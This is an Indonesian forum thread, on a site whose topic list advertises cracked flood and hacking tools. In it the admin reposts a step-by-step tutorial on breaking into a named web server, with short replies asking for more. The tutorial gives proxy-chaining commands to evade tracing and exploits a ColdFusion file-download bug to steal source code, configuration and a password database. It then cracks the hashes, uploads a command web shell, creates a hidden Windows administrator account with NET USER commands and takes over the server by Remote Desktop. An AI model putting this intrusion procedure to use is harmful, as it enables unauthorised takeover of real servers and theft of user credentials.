mig33amuntai.forummotion.com


PortalHomeFAQSearchMemberlistUsergroupsRegisterLog in
..::WELCOME TO AMUNTAI MIG33 COMMUNITY::..
Search
 
 

Display results as :
 
Rechercher Advanced Search
CLOCK
STATISTIK
widgeo.net
Latest topics
» Multy Mig Fighterx (cracked)
Wed Jan 21, 2015 1:24 am by

» GCD FULL HACKED
Wed Dec 03, 2014 2:40 pm by

» Ultimate Mig Destroyer (UMD) Cracked [free] Version
Sun Sep 21, 2014 2:38 pm by

» Mig33Bot v6.1.6
Sat Sep 20, 2014 9:11 pm by

» Brutal Kick by naim
Sat Sep 20, 2014 9:04 pm by

» mig33 kAybe's MASTER MULTY ROLLER
Sat Sep 20, 2014 9:00 pm by

» Devastation [kick and flood]masih working
Sat Sep 20, 2014 8:51 pm by

» Cr4ck3r v2.0 {hack/crack}
Sat Sep 20, 2014 10:21 am by

» Lowcard gamer v2
Tue Sep 16, 2014 7:27 am by

Top posters
amuntai
 
oded
 
satriapegasus
 
adol
 
iiccall
 
phd
 
annai
 
ipin06
 
vebrianto
 
ugz
 
D-NET RADIO STREAMING
Browser not supported
December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 
CalendarCalendar

Share  | 
 

 BELAJAR HACK SITUS

View previous topic View next topic Go down 
Author Message
amuntai
ADMIN
ADMIN


Jumlah posting : 1248
Points : 3141
Reputation : 125
Join date : 2009-12-05
Age : 29
Lokasi : Kalimantan Selatan

PostSubject: BELAJAR HACK SITUS   Tue Mar 16, 2010 8:39 am

BELAJAR HACK SITUS

Hehehehe ngomong2
dulu
forum cianjur33.forumotion.com juga sempet ada yang hack...!!!
ketauan
cuma ip nya
aja tapi orangnya belum kertemu

Studi Kasus
kelemahan Server
Situs [You must be registered and logged in to see this link.]
Oleh
Satria Kelana
Published:
Oktober 29, 2007
Print

Situs [You must be registered and logged in to see this link.]
secara
sekilas terlihat tidak memiliki bug yang cukup berarti untuk
dieksploitasi
oleh hacker. Namun ternyata masih terdapat celah yang
bisa
dieksploitasi.
Berikut ini langkah-langkah yang dilakukan untuk
membobol
server
ini.

1. Persiapan hacking
2.
Pemeriksaan
bug
3. Mendownload source code dan file konfigurasi
4.

Mengupload file explorer dan windows shell command interface
5.
Mengambil-alih
server


Saya akan menjelaskan
langkah-langkah di atas
satu per satu.

1.
Persiapan hacking

Sebelumnya
Anda harus memiliki list proxy
server yang mendukung
proxy-chain
untuk menghindari pelacakan. Anda
harus mengkoneksikan
sekurang-kurangnya
2 anonymous proxy server di 2
negara yang berbeda.
Anda dengan
mudah mendapatkan proxy server di
search engine Google.
Namun
bila Anda menemukan lebih banyak
transparant proxy server,
gunakan
3 transparant proxy server yang
mendukung chain, dan rutekan
koneksinya
melintasi beberapa negara,
misalnya: Brazil - China - India,
sehingga
bila dilacak oleh
"Pengejar Hacker" maka mereka hanya akan
melacak
koneksi dari ISP
Indonesia ke China.

Pada sistem operasi
windows, anda dapat
menggunakan software mungil
bouncer.exe untuk
melakukan proxy-chain
melalui parameter tunneling.
Contoh dengan
IP lokal 192.168.0.5:

bouncer
--bind 192.168.0.5 --port 8881
--tunnel 82.0.0.1:8080 --destination
221.0.0.1:8080
bouncer
--bind 192.168.0.5 --port 8882 --tunnel
192.168.0.5:8881
--destination 200.0.0.1:3128

Pada contoh di
atas, bila kita
mengeset proxy pada internet browser
menjadi
192.168.0.5:8882
maka koneksi kita akan dirutekan melalui proxy
server:

82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> [You must be registered and logged in to see this link.]

Karena
kita menggunakan transparant proxy server maka IP 221.0.0.1 juga
akan
terlacak. Namun ini tidak masalah karena kita sebenarnya
terkoneksi
dari
proxy server 82.0.0.1.

2. Pemeriksaan bug
Pemeriksaan
dilakukan secara trial and error pada setiap parameter yang
diperkirakan
mengandung bug. Pada kasus ini terdapat bug pada module
downloading
file
untuk mendownload file .mp3 dengan URL:

[You must be registered and logged in to see this link.]

Dari
parameter di atas terlihat file dl_comm.cfm terletak pada folder
download.
Sekarang kita coba secara langsung mengeksekusi pada file
.cfm
tersebut
dan menyisipkan parameter querystring cfile untuk
mendapatkan

source codenya.

[You must be registered and logged in to see this link.]

Ternyata
hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian
penting dari source code tersebut.





Dari source
code ini kita bisa menemukan bahwa terdapat parameter
querystring
abs_dir
dan cfile yang bisa mengarahkan kita untuk
mendownload file
apa
saja dari harddisk server.


3.
Mendownload
source code dan file konfigurasi


Kita jejaki
setiap
link di dalam source code-nya, kemudian kita download. Misalnya:

[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]

Dari
kumpulan file inilah kemudian kita mendapatkan bocoran source code
situs
[You must be registered and logged in to see this link.] yang telah diberitakan
sebelumnya
di situs ini.

Selanjutnya kita download file
konfigurasi web
servernya dengan cara berikut:

File konfigurasi
IIS:
[You must be registered and logged in to see this link.]

File
konfigurasi CFM:
[You must be registered and logged in to see this link.]

File
History Internet Explorer untuk Administrator
[You must be registered and logged in to see this link.]
and Settings\Administrator\Local Settings\History\History.IE5\index.dat

Dari
file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs
web
yang hosting di server ini.
- [You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.] yang terletak di
E:\webuser\web\powerofpaytv.com
-
[You must be registered and logged in to see this link.]
yang terletak di
E:\webuser\web\jedrealty.com
- [You must be registered and logged in to see this link.]
yang terletak di E:\webuser\web\rasasayang.com.my

Dari file
index.dat
kita dapat mengetahui bahwa Administrator melakukan
proses
administrasi
upload dan download file dengan mengunjungi [You must be registered and logged in to see this link.]

Dari
file neo-query.xml kita dapat mengetahui file database pengguna
terletak
di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db. mdb yang
dapat
kita download melalui:
[You must be registered and logged in to see this link.]

Dari
file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password
dalam
bentuk MD5 hash. Dengan menggunakan software decryptor misalnya
Cain
& Abel kita dapat mendecyrpt passwordnya.


4. Mengupload file explorer dan windows shell command
interface

Dari
[You must be registered and logged in to see this link.]
kita
dapat
mengupload file explorer misalnya ASF File Explorer yang
dibuat

oleh Nahuel Foronda and Laura Arguello. Dengan ASF File
Explorer,
kita
dapat membrowse file di harddisk secara lebih leluasa,
serta
meng-upload,
download dan delete file.

Untuk windows shell
command
interface, kita buatkan file.CFM dengan script berikut:




arguments="#strArg#"
timeout="5">






#Replace(Replace(Replace('#cmdResult#',
'<', '<', 'all'), '>', '>', 'all'), Chr(10), '
',
'all')#



5. Mengambil-alih
server

Kita dapat
menambahkan user login windows (group
administrator) dengan
mengeksekusi
perintah berikut pada windows
shell command interface.

NET
USER mbahjambon mypassword /ADD
/ACTIVE:YES /EXPIRES:NEVER
/PASSWORDCHG:YES
NET LOCALGROUP
Administrators mbahjambon /ADD

Dengan
menggunakan Windows Remote
Desktop kita dapat mengambil alih
servernya
(IP 202.157.176.17).
Koneksinya tetap dilakukan melalui proxy
tunneling
seperti contoh
berikut:

bouncer --bind 192.168.0.5 --port
8883 --tunnel
82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer
--bind 192.168.0.5
--port 8884 --tunnel 192.168.0.5:8883
--destination 202.157.176.17:3389

sehingga
kita dapat
meremote server melalui Remote Desktop pada alamat:
192.168.0.5:8884

Demikian
cara yang digunakan untuk membobol
server situs [You must be registered and logged in to see this link.]
Dengan membaca tulisan
ini, mudah-mudahan para pembaca dapat
menghindari bug sejenis pada
server Anda.

digunakan
dengan bijak...
jangan
di salah gunakan..
salam buat para
hacker [You must be registered and logged in to see this image.]

_________________
[You must be registered and logged in to see this image.]

"org tergoblok se Amuntai mau ke JAKARTA PUSAT"
(cita-cita alm. kakek gw)
Back to top Go down
View user profile http://amuntai.co.tv
satriapegasus
TECHNICIANS
TECHNICIANS


Jumlah posting : 235
Points : 284
Reputation : 6
Join date : 2010-03-05
Age : 34
Lokasi : surakarta hadiningrat (solo)

PostSubject: Re: BELAJAR HACK SITUS   Fri Mar 19, 2010 12:25 pm

dosa lhooooo....... [You must be registered and logged in to see this image.]


tapi ga smua programer mampu melakukannya juga.....hehehhe.... [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]

[You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.]
Back to top Go down
View user profile http://www.cyber-kicker.forumsmotion.com
fadhil
NEW MEMBER
NEW MEMBER


Jumlah posting : 1
Points : 1
Reputation : 0
Join date : 2010-06-14
Age : 24

PostSubject: Re: BELAJAR HACK SITUS   Mon Jun 14, 2010 3:23 am

KK bisa ajarain saya biar saya jadi hacker.....tolong ajarin....apakah saya bisa menghubungi anda............
Back to top Go down
View user profile
amuntai
ADMIN
ADMIN


Jumlah posting : 1248
Points : 3141
Reputation : 125
Join date : 2009-12-05
Age : 29
Lokasi : Kalimantan Selatan

PostSubject: Re: BELAJAR HACK SITUS   Mon Jun 14, 2010 3:48 am

whahahahha saya cuman tukang copas bukan hacker [You must be registered and logged in to see this image.]

_________________
[You must be registered and logged in to see this image.]

"org tergoblok se Amuntai mau ke JAKARTA PUSAT"
(cita-cita alm. kakek gw)
Back to top Go down
View user profile http://amuntai.co.tv
toshiba
GOLDEN MEMBER
GOLDEN MEMBER


Jumlah posting : 31
Points : 32
Reputation : 1
Join date : 2010-09-28
Age : 56

PostSubject: Re: BELAJAR HACK SITUS   Sun Oct 10, 2010 1:56 am

mantab bos elmunya....lanjutkan
Back to top Go down
View user profile
erwindelta
NEW MEMBER
NEW MEMBER


Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 2011-08-25
Age : 23

PostSubject: Re: BELAJAR HACK SITUS   Thu Aug 25, 2011 7:10 am

gan bisa gk tutornya agak rinci lg ???????? bilut
Back to top Go down
View user profile
Ryujin
NEW MEMBER
NEW MEMBER


Jumlah posting : 1
Points : 1
Reputation : 0
Join date : 2012-06-02
Age : 24

PostSubject: Re: BELAJAR HACK SITUS   Sat Jun 02, 2012 1:10 pm

download apps bouncer.exe ny di mana massbroo??? mikir
Back to top Go down
View user profile
damiandavid245
NEW MEMBER
NEW MEMBER


Jumlah posting : 4
Points : 4
Reputation : 0
Join date : 2012-10-01
Age : 28

PostSubject: Re: BELAJAR HACK SITUS   Mon Oct 01, 2012 2:13 pm

thank gan
Back to top Go down
View user profile
Sponsored content




PostSubject: Re: BELAJAR HACK SITUS   Today at 10:36 am

Back to top Go down
 

BELAJAR HACK SITUS

View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum: You cannot reply to topics in this forum
mig33amuntai.forummotion.com :: .:: COMPUTER ::. :: Tips & Trik -
Free forum | © phpBB | Free forum support | Contact | Report an abuse | Free forum